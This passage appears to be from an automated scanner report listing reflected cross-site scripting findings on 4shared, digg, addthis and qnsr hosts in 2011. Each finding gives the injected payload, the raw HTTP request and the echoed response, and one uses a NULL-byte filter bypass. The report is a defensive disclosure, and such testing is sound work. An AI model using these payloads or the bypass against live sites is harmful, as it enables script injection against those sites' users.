This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa85e5"-alert(1)-"9824e0eb5f7 HTTP/1.1
Host: dc305.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa85e5&quot;-alert(1)-&quot;9824e0eb5f7
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Thu, 24 Feb 2011 19:46:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc305.4shared.com/main/upload.jspa85e5"-alert(1)-"9824e0eb5f7";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.69. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46541"-alert(1)-"704b9402c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main46541"-alert(1)-"704b9402c2d/upload.jsp HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main46541&quot;-alert(1)-&quot;704b9402c2d/upload.jsp
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main46541"-alert(1)-"704b9402c2d/upload.jsp";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.70. http://dc308.4shared.com/main/upload.jsp [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc308.4shared.com
Path:   /main/upload.jsp

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7371"-alert(1)-"109e745b72 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main/upload.jspa7371"-alert(1)-"109e745b72 HTTP/1.1
Host: dc308.4shared.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 /main/upload.jspa7371&quot;-alert(1)-&quot;109e745b72
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 23:12:54 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4shared.co
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://dc308.4shared.com/main/upload.jspa7371"-alert(1)-"109e745b72";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.71. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e8cb0"><script>alert(1)</script>eee6eb58e9b was submitted in the REST URL parameter 1. This input was echoed as e8cb0"><script>alert(1)</script>eee6eb58e9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:59:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=2107412045744832512%3A187; expires=Sun, 27-Feb-2011 01:59:47 GMT; path=/; domain=digg.com
Set-Cookie: d=8bfb598c2877d172a9ca2cfcac5aad764d4f0bf5a31a5a261d3ab41be1d8a5f8; expires=Thu, 25-Feb-2021 12:07:27 GMT; path=/; domain=.digg.com
X-Digg-Time: D=260640 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16660

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00e8cb0"><script>alert(1)</script>eee6eb58e9b.rss">
...[SNIP]...

1.72. http://ds.addthis.com/red/psi/sites/www.manta.com/p.json [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.manta.com/p.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload e5ae4<script>alert(1)</script>e6a6ac44971 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /red/psi/sites/www.manta.com/p.json?callback=_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971&uid=4d5af32c71c2e1a5&url=http%3A%2F%2Fwww.manta.com%2Fc%2Fmtl07lp%2Findustrial-waste-recovery-llc&w1bilb HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh32.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; dt=X; di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298426248.60|1297806627.66; psc=4; uid=4d5af32c71c2e1a5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 314
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 26 Feb 2011 00:20:52 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 28 Mar 2011 00:20:52 GMT; Path=/
Set-Cookie: di=%7B%222%22%3A%223375925924%2CrcHW801b0RcADNFE%22%7D..1298679652.60|1297806627.66; Domain=.addthis.com; Expires=Sun, 24-Feb-2013 18:22:57 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 26 Feb 2011 00:20:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 26 Feb 2011 00:20:52 GMT
Connection: close

_ate.ad.hpre5ae4<script>alert(1)</script>e6a6ac44971({"urls":["http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d5af32c71c2e1a5&curl=http%3a%2f%2fwww.manta.com%2fc%2fmtl07lp%2findustrial-waste-recovery-llc"],"segments"
...[SNIP]...

1.73. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc29'%3b0ddd73bd74d was submitted in the REST URL parameter 10. This input was echoed as acc29';0ddd73bd74d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203acc29'%3b0ddd73bd74d/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591996
Expires: Mon, 28 Mar 2011 01:49:45 GMT
Date: Sat, 26 Feb 2011 01:49:49 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203acc29';0ddd73bd74d;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" o
...[SNIP]...

1.74. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 11]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 11 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88920'%3b539f91e0bd9 was submitted in the REST URL parameter 11. This input was echoed as 88920';539f91e0bd9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/859888920'%3b539f91e0bd9//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:53 GMT
Date: Sat, 26 Feb 2011 01:49:53 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0;n=203;s=859888920';539f91e0bd9;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return true;" onMouseO
...[SNIP]...

1.75. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4693'%3b652b91c5004 was submitted in the REST URL parameter 4. This input was echoed as d4693';652b91c5004 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536d4693'%3b652b91c5004/0/0/203635133/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:32 GMT
Date: Sat, 26 Feb 2011 01:49:32 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536d4693';652b91c5004;c=203635133,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="win
...[SNIP]...

1.76. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c75eb'%3b9d193661b16 was submitted in the REST URL parameter 7. This input was echoed as c75eb';9d193661b16 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133c75eb'%3b9d193661b16/203635133//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2591982
Expires: Mon, 28 Mar 2011 01:49:22 GMT
Date: Sat, 26 Feb 2011 01:49:40 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133c75eb';9d193661b16,203635133;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\
...[SNIP]...

1.77. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 8 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 48b1e'%3b09e5343efb0 was submitted in the REST URL parameter 8. This input was echoed as 48b1e';09e5343efb0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/20363513348b1e'%3b09e5343efb0//0/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:43 GMT
Date: Sat, 26 Feb 2011 01:49:43 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,20363513348b1e';09e5343efb0;i=0;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; retur
...[SNIP]...

1.78. http://e1.cdn.qnsr.com/cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js [REST URL parameter 9]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e1.cdn.qnsr.com
Path:   /cgi/k/20120772/1536/0/0/203635133/203635133//0/203/8598//1/i.js

Issue detail

The value of REST URL parameter 9 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9039'%3bec5d10b6574 was submitted in the REST URL parameter 9. This input was echoed as a9039';ec5d10b6574 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cgi/k/20120772/1536/0/0/203635133/203635133//0a9039'%3bec5d10b6574/203/8598//1/i.js HTTP/1.1
Host: e1.cdn.qnsr.com
Proxy-Connection: keep-alive
Referer: http://e1.cdn.qnsr.com/cgi/d/1537/0/203/635133/549914/i0.html?;y=http%3A//blog.internetnews.com/skerner/2011/02/google-chrome-gets-cranked-to.html;s=8598;d=camp20985953~camp20993046::ch203687986ad20142038~ch203687989ad20141534~ch203687989ad20143682~ch203687989ad20140829~ch203687987ad20145841~ch203687989ad20143853~ch203687984ad20132865~ch203687988ad20138856;z=3795111825
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: QIDA=TVrzNgqABU0AABtR2Bo; QUADIDX=107; qsg=14508; QPC201001141843480=ZZa20099791Zc203555503%2C203555503Zg172Zw56Zm0Zs8986Zk166110218044716818ZrNULLZiNULLZt149ZZ; QCP201001141843480=JkNDSUQ9MjAxMjM1MTkyMDM2MzA5MTAmUVRSPVpaZjBaYTIwMTIzNTE5WmIwWmcxNzJadzU2Wm0wWmMyMDM2MzA5MTAsMjAzNjMwOTEwWnM5NTQ0WlomQ0xLPTM5NDExMDIxOA==

Response

HTTP/1.1 200 OK
Server: QUAD 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/javascript
Vary: Accept-Encoding
Cache-Control: max-age=2592000
Expires: Mon, 28 Mar 2011 01:49:46 GMT
Date: Sat, 26 Feb 2011 01:49:46 GMT
Connection: close
Content-Length: 743


var zz_trd = "";
var zz_param = "";
var zz_ref = "";

if (typeof zzTrd != 'undefined') { zz_trd = zzTrd; }
if (typeof zzParam != 'undefined') { zz_param = zzParam + ";"; }
if (typeof zzRef != 'undefi
...[SNIP]...
<A HREF="http://o1.qnsr.com//cgi/c?a=20120772;x=1536;c=203635133,203635133;i=0a9039';ec5d10b6574;n=203;s=8598;p=20484683;f=20484669;' + zz_param + zz_ref + zzStr + ';k=' + zz_trd + 'http://technology.search-schools.com/onestepsearch.jsp?" TARGET="_blank" onMouseOver="window.status=\'\'; return tr
...[SNIP]...

1.79. http://e2.cdn.qnsr.com//cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js [REST URL parameter 10]

Summary

Severity:   High
Confidence:   Firm
Host:   http://e2.cdn.qnsr.com
Path:   //cgi/k/20119051/21248/0/0/203687986/203687986//0/203/9542//1/i.js

Issue detail

The value of REST URL parameter 10 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4d7c'%3bafdedb92150 was submitted in the REST URL parameter 10. This input was echoed as f4d7c';afdedb92150 in the application's response.

